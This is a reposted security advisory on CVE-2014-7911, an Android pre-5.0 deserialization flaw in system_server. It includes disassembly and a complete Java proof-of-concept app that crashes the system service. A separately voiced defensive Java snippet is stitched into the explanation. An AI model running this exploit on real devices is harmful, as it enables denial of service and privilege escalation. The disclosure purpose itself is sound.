[News]

Android: privilege escalation vulnerability in versions below 5.0

2015-7-10 01:02


CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream

From: Jann Horn

Date: Wed, 19 Nov 2014 02:31:15 +0100

------------------------------------------------------------------------------------------------------------------------------------------

In Android <5.0, java.io.ObjectInputStream did not check whether the Object that is being deserialized is actually serializable. That issue was fixed in Android 5.0 with this commit:

This means that when ObjectInputStream is used on untrusted input, an attacker can cause an instance of any class with a non-private parameterless constructor to be created, with all of its fields set to arbitrary values. The malicious object will then typically either be ignored or cast to a type it does not match, so no methods are called on it and no data from it is used. However, when it is collected by the GC, the GC calls the object's finalize method.
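As an added defensive illustration (my own example, not code from Jann Horn's advisory or from AOSP), the following plain-Java ObjectInputStream subclass performs the check that was missing here: it rejects any class descriptor not on an explicit allowlist and additionally refuses a resolved class that does not implement Serializable, before any instance is allocated. The CheckedObjectInputStream name, the allowlist contents and the java.util.Date sample payload are assumptions constructed for the demo.

```java
import java.io.*;
import java.util.Set;

// Hypothetical hardened reader: an allowlist plus the "is it actually Serializable" check
// that ObjectInputStream on Android <5.0 did not perform.
public final class CheckedObjectInputStream extends ObjectInputStream {
    private final Set<String> allowed;

    public CheckedObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
        super(in);
        this.allowed = allowed;
    }

    // Called while the class descriptor is read, i.e. before any instance is created,
    // so a rejected class never reaches a constructor and never becomes finalizable.
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!allowed.contains(name)) {
            throw new InvalidClassException(name, "not on the deserialization allowlist");
        }
        Class<?> cls = super.resolveClass(desc);
        if (!Serializable.class.isAssignableFrom(cls)) {
            throw new InvalidClassException(name, "stream names a class that is not Serializable");
        }
        return cls;
    }

    // Demo with a constructed payload: a java.util.Date round-trips when allowed, and the same
    // bytes are refused when the allowlist is empty.
    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new java.util.Date(0));
        }
        byte[] payload = bos.toByteArray();
        try (ObjectInputStream in = new CheckedObjectInputStream(new ByteArrayInputStream(payload), Set.of("java.util.Date"))) {
            System.out.println("accepted: " + in.readObject());
        }
        try (ObjectInputStream in = new CheckedObjectInputStream(new ByteArrayInputStream(payload), Set.of())) {
            in.readObject();
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On Java 9 and later the same policy can be expressed with ObjectInputFilter instead of overriding resolveClass. On Android the framework's own ObjectInputStream inside system_server is outside an app's control, which is why this fix had to land in the platform itself.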

The android system_service runs under uid 1000 and can change into the context of any app, install new applications with arbitrary permissions and so on. Apps can talk to it using Intents with attached Bundles; Bundles are transferred as arraymap Parcels, and arraymap Parcels can contain serialized data. This means that any app can attack the system_service this way.

The class android.os.BinderProxy contains a finalize method that calls into native code. This native code then takes the values of two fields of type int or long (depending on the Android version), casts them to pointers and dereferences them. On Android 4.4.3, this is where one of those pointers ends up. r0 contains the attacker-supplied pointer, and if the attacker can insert data into the process at a known address, they end up gaining arbitrary code execution in system_server:

# attacker controls pointer in r0
0000d1c0 <:refbase::decstrong const>:
d1c0:       b570            push    {r4, r5, r6, lr}
d1c2:       4605            mov     r5, r0
d1c4:       6844            ldr     r4, [r0, #4]   # attacker controls r4
d1c6:       460e            mov     r6, r1
d1c8:       4620            mov     r0, r4
d1ca:       f7fd e922       blx     a410
d1ce:       2801            cmp     r0, #1
d1d0:       d10b            bne.n   d1ea
d1d2:       68a0            ldr     r0, [r4, #8]   # attacker controls r0
d1d4:       4631            mov     r1, r6
d1d6:       6803            ldr     r3, [r0, #0]   # attacker controls r3
d1d8:       68da            ldr     r2, [r3, #12]  # attacker controls r2
d1da:       4790            blx     r2             # jump into attacker-controlled r2 pointer

Android does have ASLR, but like all apps, system_server is forked from the zygote process - in other words, all apps have the same basic memory layout as system_server and should therefore be able to circumvent system_server's ASLR.

Here's my crash PoC code. Put it in an android app, install that app, open it. If nothing happens, the GC might be taking its time - try doing other stuff or reopening the PoC app or so. Your device should do something like a reboot after a few seconds.

PoC (reboot):

package net.thejh.badserial;

import java.io.Serializable;
import java.io.UnsupportedEncodingException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

import dalvik.system.DexClassLoader;

import android.app.Activity;
import android.content.Context;
import android.os.Bundle;
import android.os.IBinder;
import android.os.Parcel;
import android.os.UserHandle;
import android.os.UserManager;
import android.util.Log;

public class MainActivity extends Activity {

    private static final java.lang.String DESCRIPTOR = "android.os.IUserManager";
    private Class clStub;
    private Class clProxy;
    private int TRANSACTION_setApplicationRestrictions;
    private IBinder mRemote;

    public void setApplicationRestrictions(java.lang.String packageName, android.os.Bundle restrictions, int userHandle) throws android.os.RemoteException
    {
        android.os.Parcel _data = android.os.Parcel.obtain();
        android.os.Parcel _reply = android.os.Parcel.obtain();
        try {
            _data.writeInterfaceToken(DESCRIPTOR);
            _data.writeString(packageName);
            _data.writeInt(1);
            restrictions.writeToParcel(_data, 0);
            _data.writeInt(userHandle);
            byte[] data = _data.marshall();
            for (int i=0; true; i++) {
                if (data[i] == 'A' && data[i+1] == 'A' && data[i+2] == 'd' && data[i+3] == 'r') {
                    data[i] = 'a';
                    data[i+1] = 'n';
                    break;
                }
            }
            _data.recycle();
            _data = Parcel.obtain();
            _data.unmarshall(data, 0, data.length);
            mRemote.transact(TRANSACTION_setApplicationRestrictions, _data, _reply, 0);
            _reply.readException();
        }
        finally {
            _reply.recycle();
            _data.recycle();
        }
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Log.i("badserial", "starting... (v3)");
        Context ctx = getBaseContext();
        try {
            Bundle b = new Bundle();
            AAdroid.os.BinderProxy evilProxy = new AAdroid.os.BinderProxy();
            b.putSerializable("eatthis", evilProxy);
            Class clIUserManager = Class.forName("android.os.IUserManager");
            Class[] umSubclasses = clIUserManager.getDeclaredClasses();
            System.out.println(umSubclasses.length+" inner classes found");
            Class clStub = null;
            for (Class c: umSubclasses) {
                System.out.println("inner class: "+c.getCanonicalName());
                if (c.getCanonicalName().equals("android.os.IUserManager.Stub")) {
                    clStub = c;
                }
            }
            Field fTRANSACTION_setApplicationRestrictions =
                    clStub.getDeclaredField("TRANSACTION_setApplicationRestrictions");
            fTRANSACTION_setApplicationRestrictions.setAccessible(true);
            TRANSACTION_setApplicationRestrictions =
                    fTRANSACTION_setApplicationRestrictions.getInt(null);
            UserManager um = (UserManager) ctx.getSystemService(Context.USER_SERVICE);
            Field fService = UserManager.class.getDeclaredField("mService");
            fService.setAccessible(true);
            Object proxy = fService.get(um);
            Class[] stSubclasses = clStub.getDeclaredClasses();
            System.out.println(stSubclasses.length+" inner classes found");
            clProxy = null;
            for (Class c: stSubclasses) {
                System.out.println("inner class: "+c.getCanonicalName());
                if (c.getCanonicalName().equals("android.os.IUserManager.Stub.Proxy")) {
                    clProxy = c;
                }
            }
            Field fRemote = clProxy.getDeclaredField("mRemote");
            fRemote.setAccessible(true);
            mRemote = (IBinder) fRemote.get(proxy);
            UserHandle me = android.os.Process.myUserHandle();
            setApplicationRestrictions(ctx.getPackageName(), b, me.hashCode());
            Log.i("badserial", "waiting for boom here and over in the system service...");
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
}

===============================================================================

package AAdroid.os;

import java.io.Serializable;

public class BinderProxy implements Serializable {
    private static final long serialVersionUID = 0;
    public long mObject = 0x1337beef;
    public long mOrgue = 0x1337beef;
}

===============================================================================

This is what you should see in the system log:

F/libc    (  382): Fatal signal 11 (SIGSEGV) at 0x1337bef3 (code=1), thread 391 (FinalizerDaemon)
[...]
I/DEBUG   (   47): pid: 382, tid: 391, name: FinalizerDaemon  >>> system_server <<<
I/DEBUG   (   47): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 1337bef3
I/DEBUG   (   47):     r0 1337beef  r1 b6de7431  r2 b6ee035c  r3 81574845
I/DEBUG   (   47):     r4 b6de7431  r5 1337beef  r6 b7079ec8  r7 1337beef
I/DEBUG   (   47):     r8 1337beef  r9 abaf5f68  sl b7056678  fp a928bb04
I/DEBUG   (   47):     ip b6e1e8c8  sp a928bac8  lr b6de63d9  pc b6e6c15e  cpsr 60000030

Timeline:

22.06.2014 - 26.06.2014  issue reported, PoC shared, issue verified by security@android.com
around 03.11.2014        patch published as part of the AOSP code release
07.11.2014 - 19.11.2014  asked Android team whether disclosing this is OK now, got CVE number from them

-------------------------------------------------------------------------------------

Reposted from: 非安全中国网
